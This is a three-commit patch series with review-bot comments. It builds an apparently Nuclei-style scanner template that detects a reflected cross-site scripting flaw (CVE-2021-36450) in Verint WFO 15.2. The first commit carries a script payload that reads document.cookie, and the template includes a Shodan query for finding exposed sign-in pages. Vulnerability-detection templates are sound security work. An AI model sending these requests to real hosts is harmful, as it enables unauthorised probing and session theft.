From def429e92767dd1fa1e2f27079b0605908d81dda Mon Sep 17 00:00:00 2001
From: atomic <75549184+atomiczsec@users.noreply.github.com>
Date: Wed, 13 Jul 2022 22:37:09 -0400
Subject: [PATCH 1/3] Add CVE-2021-36450.yaml

---
 cves/2021/CVE-2021-36450.yaml | 51 +++++++++++++++++++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 cves/2021/CVE-2021-36450.yaml

diff --git a/cves/2021/CVE-2021-36450.yaml b/cves/2021/CVE-2021-36450.yaml
new file mode 100644
index 0000000000..d9b19ac6da
--- /dev/null
+++ b/cves/2021/CVE-2021-36450.yaml
@@ -0,0 +1,51 @@
+id: CVE-2021-36450
+
+info:
+ name: Verint 15.2 XSS
+ author: atomiczsec
+ severity: medium
+ description: F Verint 15.2 (15.2.8.10048) Cross Site Scripting (XSS)
+ reference:
+ - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
+ - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
+ metadata:
+ shodan-query: title:"Verint Sign-in"
+ classification:
+ cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2021-36450
+ cwe-id: CWE-79
+
+ tags: cve,cve2021,xss
+requests:
+ - raw:
+ - |-
+ POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26 HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: BIGipServer~WFO~WFO_VERINTAPP_HTTPS=1008015114.47873.0000; TS019568ef=012ae9fa175730d8c6833bc61a72737e509d8e4e11353b3e5616f302159403288a8010f798cf861e68949a5e2ab28fa9e5cabe247e; JSESSIONID=6j_0IpQrt2_52N1gIC6eGXNeMrla5evPz-az1EdLYZJI1XrS3NSg!-1403817999
+ Content-Length: 155
+ Cache-Control: max-age=0
+ Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="100"
+ Sec-Ch-Ua-Mobile: ?0
+ Sec-Ch-Ua-Platform: "Windows"
+ Upgrade-Insecure-Requests: 1
+ Origin: https://verint11.five9-wfo.com
+ Content-Type: application/x-www-form-urlencoded
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Sec-Fetch-Site: same-origin
+ Sec-Fetch-Mode: navigate
+ Sec-Fetch-User: ?1
+ Sec-Fetch-Dest: document
+ Referer: https://verint11.five9-wfo.com/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-US,en;q=0.9
+ Connection: close
+
+ browserCheckEnabled=true&username=TEST&language=en_US&defaultHttpPort=-1&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - class="loginUserNameText">TEST
From a74f7900d9dd0cca6701dd94a98c45c9cc47bf28 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Thu, 14 Jul 2022 13:27:13 +0530
Subject: [PATCH 2/3] Update CVE-2021-36450.yaml

---
 cves/2021/CVE-2021-36450.yaml | 44 ++++++++++++++++++++++++-----------
 1 file changed, 30 insertions(+), 14 deletions(-)

diff --git a/cves/2021/CVE-2021-36450.yaml b/cves/2021/CVE-2021-36450.yaml
index d9b19ac6da..50fe6a1eb7 100644
--- a/cves/2021/CVE-2021-36450.yaml
+++ b/cves/2021/CVE-2021-36450.yaml
@@ -1,51 +1,67 @@ id: CVE-2021-36450 info: - name: Verint 15.2 XSS + name: Verint 15.2 - Cross Site Scripting author: atomiczsec severity: medium - description: F Verint 15.2 (15.2.8.10048) Cross Site Scripting (XSS) + description: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter. reference: - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-36450 metadata: + verified: true shodan-query: title:"Verint Sign-in" classification: cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2021-36450 cwe-id: CWE-79 + tags: cve,cve2021,xss,verint - tags: cve,cve2021,xss requests: - raw: - - |- - POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26 HTTP/1.1 + - | + GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1 Host: {{Hostname}} - Cookie: BIGipServer~WFO~WFO_VERINTAPP_HTTPS=1008015114.47873.0000; TS019568ef=012ae9fa175730d8c6833bc61a72737e509d8e4e11353b3e5616f302159403288a8010f798cf861e68949a5e2ab28fa9e5cabe247e; JSESSIONID=6j_0IpQrt2_52N1gIC6eGXNeMrla5evPz-az1EdLYZJI1XrS3NSg!-1403817999 - Content-Length: 155 + + - | + POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1 + Host: {{Hostname}} + Content-Length: 213 Cache-Control: max-age=0 - Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="100" + Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103" Sec-Ch-Ua-Mobile: ?0 - Sec-Ch-Ua-Platform: "Windows" + Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 - Origin: https://verint11.five9-wfo.com + Origin: https://12.221.75.74 Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 
10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document - Referer: https://verint11.five9-wfo.com/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26 + Referer: https://12.221.75.74/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close - browserCheckEnabled=true&username=TEST&language=en_US&defaultHttpPort=-1&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login + browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}} + + redirects: true + max-redirects: 2 + cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - - class="loginUserNameText">TEST + - '">

Test

&" class="loginUserNameText' + + extractors: + - type: regex + name: csrfp_login + group: 1 + regex: + - 'csrfp_login=([a-zA-Z0-9]+);' From d9841ece3a1f59e05f854d1f2cc2109f897e623a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 14 Jul 2022 13:59:41 +0530 Subject: [PATCH 3/3] Update CVE-2021-36450.yaml --- cves/2021/CVE-2021-36450.yaml | 49 ++++++++++++++++------------------- 1 file changed, 22 insertions(+), 27 deletions(-) diff --git a/cves/2021/CVE-2021-36450.yaml b/cves/2021/CVE-2021-36450.yaml index 50fe6a1eb7..c63377f3c1 100644 --- a/cves/2021/CVE-2021-36450.yaml +++ b/cves/2021/CVE-2021-36450.yaml @@ -9,14 +9,14 @@ info: - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html - https://nvd.nist.gov/vuln/detail/CVE-2021-36450 - metadata: - verified: true - shodan-query: title:"Verint Sign-in" classification: cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2021-36450 cwe-id: CWE-79 + metadata: + verified: true + shodan-query: title:"Verint Sign-in" tags: cve,cve2021,xss,verint requests: 
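Review bot: The GET and POST added in this hunk carry two different forms of the same `rd` payload — the GET ends in `%3C%2Fh1%3E26` (closing tag, then a literal `26`) while the POST and its `Referer` end in `%3Ch1%3E%26` (no closing slash, then an encoded `&`) — so the body word matcher is tied to whichever response happens to reflect it rather than to one fixed marker. Presumably one of the two was mangled when the original `alert(document.cookie)` payload was swapped for the benign `Test` heading; both requests should carry the identical encoded value, and the matcher's words should be the exact reflected form of that value (the tags inside the quoted words here appear to have been stripped by the rendering, so I cannot tell which form it currently expects). The same POST line survives as context in the next commit's `@@ -28,40 +28,35 @@` hunk, whose rewritten matcher ends in `26" class="loginUserNameText` and therefore fits only the GET form.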
@@ -28,40 +28,35 @@ requests: - | POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1 Host: {{Hostname}} - Content-Length: 213 - Cache-Control: max-age=0 - Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103" - Sec-Ch-Ua-Mobile: ?0 - Sec-Ch-Ua-Platform: "macOS" - Upgrade-Insecure-Requests: 1 - Origin: https://12.221.75.74 Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: navigate - Sec-Fetch-User: ?1 - Sec-Fetch-Dest: document - Referer: https://12.221.75.74/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}} redirects: true max-redirects: 2 cookie-reuse: true + + extractors: + - type: regex + part: header + internal: true + name: csrfp_login + group: 1 + regex: + - 'csrfp_login=([a-zA-Z0-9]+);' + matchers-condition: and matchers: - type: word part: body words: - - '">

Test

&" class="loginUserNameText' + - '">

Test

26" class="loginUserNameText' - extractors: - - type: regex - name: csrfp_login - group: 1 - regex: - - 'csrfp_login=([a-zA-Z0-9]+);' + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200
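Review bot: The `csrfp_login` extractor's regex `'csrfp_login=([a-zA-Z0-9]+);'` needs a `;` immediately after the value and stops at the first non-alphanumeric character, so a token containing `-`, `_` or `=`, or a `Set-Cookie` that ends without further attributes, is captured truncated or not at all, and the POST on the context line at the top of this hunk would then be sent with `{{csrfp_login}}` unresolved. Unless the token alphabet is fixed by the product, `- 'csrfp_login=([^;\s]+)'` is the safer pattern. With `internal: true` the extracted value is no longer reported, so a failed extraction surfaces only as a missing match on the final request; a comment above the extractor such as `# csrfp_login is presumably set by the first (GET) response and replayed in the POST body` would make that dependency visible to the next maintainer.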